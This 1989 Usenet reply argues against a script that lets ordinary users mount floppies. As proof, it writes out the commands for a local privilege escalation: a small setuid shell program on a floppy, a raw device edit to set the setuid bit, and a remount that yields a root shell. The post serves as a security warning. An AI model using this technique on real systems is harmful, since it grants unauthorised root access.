Path: utzoo!attcan!utgpu!jarvis.csri.toronto.edu!mailrus!uwm.edu!wuarchive!decwrl!orc!mipos3!omepd!merlyn
From: merlyn@iwarp.intel.com (Randal Schwartz)
Newsgroups: comp.unix.questions
Subject: Re: mounting and setuid question...
Message-ID: <5338@omepd.UUCP>
Date: 12 Dec 89 17:14:41 GMT
References: <23@gagme.uucp>
Sender: news@omepd.UUCP
Reply-To: merlyn@iwarp.intel.com (Randal Schwartz)
Organization: Stonehenge; netaccess via Intel, Hillsboro, Oregon, USA
Lines: 43
In-reply-to: gulik@gagme.uucp (Gregory Gulik)

In article <23@gagme.uucp>, gulik@gagme (Gregory Gulik) writes:
| Is it possible to set up a shell script that will
| allow non-super-user people to mount a floppy file system?

Yes... but...

| How should I be doing this?

... you shouldn't.

Mounting a trashed filesystem will take your system down *real* fast.
I suppose you could run fsck on your to-be-mounted floppy, and verify
the exit status, but that sounds like a lot of work, because it
doesn't avoid the second problem... described as so:

(presume mountflop does an fsck followed by a mount, and umountflop
does the reverse).

$ newfs /dev/flop
$ mountflop
$ cd /flop
$ cat >x.c
main() { setuid(geteuid()); exec("/bin/sh","sh",0); }
^D
$ cc x.c -o x
$ cd /
$ umountflop
$ emacs /dev/flop
[find inode table, turn on setuid bit on ./x]
$ mountflop
$ /flop/x
# [a root shell]

Sorry.  It's too easy.

(C code deliberately untested for security through obscurity.. :-)

Just another UNIX hacker,
-- 
/== Randal L. Schwartz, Stonehenge Consulting Services (503)777-0095 ====\
| on contract to Intel's iWarp project, Hillsboro, Oregon, USA, Sol III  |
| merlyn@iwarp.intel.com ...!uunet!iwarp.intel.com!merlyn	         |
\== Cute Quote: "Welcome to Oregon... Home of the California Raisins!" ==/